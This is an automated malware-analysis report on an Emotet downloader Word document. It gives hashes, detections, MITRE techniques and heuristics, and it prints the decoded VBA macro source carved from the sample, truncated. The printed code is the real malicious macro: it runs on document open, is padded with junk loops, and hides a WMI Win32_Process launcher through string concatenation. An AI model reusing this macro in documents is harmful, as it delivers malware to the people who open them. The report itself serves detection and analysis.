Emotet Office (OLE) malware analysis — malicious · f681d3ec47816f16

MALICIOUS

Office (OLE)

144.4 KB Created: 2019-05-07 10:23:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: ca2e04d6919f637597c6b785b92bb565 SHA-1: 5ac55e1b6b250555c075853f4cf998b06ec9562e SHA-256: f681d3ec47816f162e1b5dc03bdc10cdeb4fe557ae5cd3d9e3d8f19b9f1c2cef

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Windows Management Instrumentation T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6964648-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of VBA macros that utilize GetObject/CreateObject to launch Win32_Process via WMI, a common technique for executing arbitrary code. The autoopen macro further confirms the intent to execute malicious code upon opening the document.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-6964648-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6964648-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5344 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5344 bytes
SHA-256: `867414fa100558e22beda31c37c10be63c1b8caa0c619b6376265b8c31ecd394`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "B3706351" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "z048260" Attribute VB_Base = "0{E1349350-99E0-4A72-90F3-1977DB684D66}{83EDA91E-4E8B-4958-96BB-65346C640174}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "T_3475" Attribute VB_Name = "N425_1" Attribute VB_Name = "m9153981" Attribute VB_Name = "l39074" Attribute VB_Name = "E93758_" Attribute VB_Name = "X405633" Attribute VB_Name = "i60_461" Attribute VB_Name = "G62861" Attribute VB_Base = "0{AF74C80E-C402-4FA3-81E2-EEA631A2F93F}{1514659B-70B5-477D-B805-1A050E82944F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Z2393_" Function T313604(V57233) While d4_266 And J16354 'z696250v975399p299_59o459698 Wend While z885444 And Z_27110 'd0_39805k43589U04460A7_668 Wend While Y71482 And H287173 'I4_48352u8199_4C155_7M69290 Wend Set T313604 = CVar(V57233) While f502_959 And q6930442 'r156004J20601_J36_771z01_2281 Wend While V38472 And c747186 'i038_561j_9610_j497446f422_91 Wend While F68976 And O68689 'p85__6B979313k37996N10_97_8 Wend End Function Sub _ autoopen() On Error Resume Next While h71155 And K5035_80 'q48757P_5_158Q7370561C8_1038 Wend While K30223 And I922281 'u1622_56Y929527u016842a9305245 Wend While D51806 And z792_21 'z963_936G6_1264R7239326Q859462 Wend Call h10843 While b547092 And D662343 'G838632O_72536o4_1105z684407 Wend While v__46876 And z8_515 'M40915f935599q7798_35C34593 Wend While E130647 And W_821753 'r7_48971j366413R828981D8159200 Wend End Sub Attribute VB_Name = "D_35423" Function h10843() On Error Resume Next While v4_7621 And z6774422 'R_297_3Y1710874d9730264f945065 Wend While w0_87_67 And M00305 'i6_286p89864R00162J904590 Wend While V031241 And H357_2 's0575_11c76_1775H263_870n772534 Wend u203158 = z048260.m93057.ControlTipText + G62861.G482_58_ + z048260.m93057.PasswordChar + G62861.k547868_ + z048260.m93057.PasswordChar + z048260.m93057 + G62861.S16_30 + z048260.m93057.ControlTipText + z048260.m93057.ControlTipText + G62861.M265494 + z048260.m93057.PasswordChar + G62861.W97271 + z048260.m93057.PasswordChar While J548_363 And Q847621 'j3548067d1190112u7038894F51718 Wend While U775866 And o23455_ 'z898733k6198_A107727p893892 Wend Set i30816_4 = T313604(GetObject("winmgmt" _ + "s:Wi" + "n3" _ + "2_Pr" _ + "ocess")) While j57423 And S519_20 'Y09__03v53282s6776_o8_036 Wend While K266436 And W406_692 'n449083Z21178X87_7_f85259 Wend While v79296 And p00_533 'I03411_7h40533_9Q79327Y_7129 Wend i30816_4.Create D304702 + u203158 + O054302, W95258, V890227, z9_881 While J3230211 And i37_1524 'w__699j83243C9251_T365411 Wend While b05_7002 And b1641_8 'G51404E22__2Y_2052z5_5123_ Wend While f8957_3 And C_49838 'D17_23S12546H8799818z830_433 Wend End Function Attribute VB_Name = "i677857" Public Function V890227() While o2_99_ And U10188 'i40_091A8903746t076_580p688793 Wend While B62443 And F2670696 'V83778i49_43l5465_71p11_2350 Wend While L336862 And i93_65_5 'p8554363V601_897m30_9324m0641899 Wend Set V890227 = T313604(GetObject("winmgm ... (truncated)

SHA-256: 867414fa100558e22beda31c37c10be63c1b8caa0c619b6376265b8c31ecd394

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "B3706351"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "z048260"
Attribute VB_Base = "0{E1349350-99E0-4A72-90F3-1977DB684D66}{83EDA91E-4E8B-4958-96BB-65346C640174}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T_3475"

Attribute VB_Name = "N425_1"

Attribute VB_Name = "m9153981"

Attribute VB_Name = "l39074"

Attribute VB_Name = "E93758_"

Attribute VB_Name = "X405633"

Attribute VB_Name = "i60_461"

Attribute VB_Name = "G62861"
Attribute VB_Base = "0{AF74C80E-C402-4FA3-81E2-EEA631A2F93F}{1514659B-70B5-477D-B805-1A050E82944F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z2393_"
Function T313604(V57233)
         While d4_266 And J16354
'z696250v975399p299_59o459698
      Wend
         While z885444 And Z_27110
'd0_39805k43589U04460A7_668
      Wend
         While Y71482 And H287173
'I4_48352u8199_4C155_7M69290
      Wend
Set T313604 = CVar(V57233)
         While f502_959 And q6930442
'r156004J20601_J36_771z01_2281
      Wend
         While V38472 And c747186
'i038_561j_9610_j497446f422_91
      Wend
         While F68976 And O68689
'p85__6B979313k37996N10_97_8
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While h71155 And K5035_80
'q48757P_5_158Q7370561C8_1038
      Wend
         While K30223 And I922281
'u1622_56Y929527u016842a9305245
      Wend
         While D51806 And z792_21
'z963_936G6_1264R7239326Q859462
      Wend
Call h10843
         While b547092 And D662343
'G838632O_72536o4_1105z684407
      Wend
         While v__46876 And z8_515
'M40915f935599q7798_35C34593
      Wend
         While E130647 And W_821753
'r7_48971j366413R828981D8159200
      Wend
End Sub


Attribute VB_Name = "D_35423"
Function h10843()
On Error Resume Next
         While v4_7621 And z6774422
'R_297_3Y1710874d9730264f945065
      Wend
         While w0_87_67 And M00305
'i6_286p89864R00162J904590
      Wend
         While V031241 And H357_2
's0575_11c76_1775H263_870n772534
      Wend
u203158 = z048260.m93057.ControlTipText + G62861.G482_58_ + z048260.m93057.PasswordChar + G62861.k547868_ + z048260.m93057.PasswordChar + z048260.m93057 + G62861.S16_30 + z048260.m93057.ControlTipText + z048260.m93057.ControlTipText + G62861.M265494 + z048260.m93057.PasswordChar + G62861.W97271 + z048260.m93057.PasswordChar
         While J548_363 And Q847621
'j3548067d1190112u7038894F51718
      Wend
         While U775866 And o23455_
'z898733k6198_A107727p893892
      Wend
Set i30816_4 = T313604(GetObject("winmgmt" _
+ "s:Wi" + "n3" _
+ "2_Pr" _
+ "ocess"))
         While j57423 And S519_20
'Y09__03v53282s6776_o8_036
      Wend
         While K266436 And W406_692
'n449083Z21178X87_7_f85259
      Wend
         While v79296 And p00_533
'I03411_7h40533_9Q79327Y_7129
      Wend
i30816_4.Create D304702 + u203158 + O054302, W95258, V890227, z9_881
         While J3230211 And i37_1524
'w__699j83243C9251_T365411
      Wend
         While b05_7002 And b1641_8
'G51404E22__2Y_2052z5_5123_
      Wend
         While f8957_3 And C_49838
'D17_23S12546H8799818z830_433
      Wend
End Function


Attribute VB_Name = "i677857"

Public Function V890227()
         While o2_99_ And U10188
'i40_091A8903746t076_580p688793
      Wend
         While B62443 And F2670696
'V83778i49_43l5465_71p11_2350
      Wend
         While L336862 And i93_65_5
'p8554363V601_897m30_9324m0641899
      Wend
Set V890227 = T313604(GetObject("winmgm
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.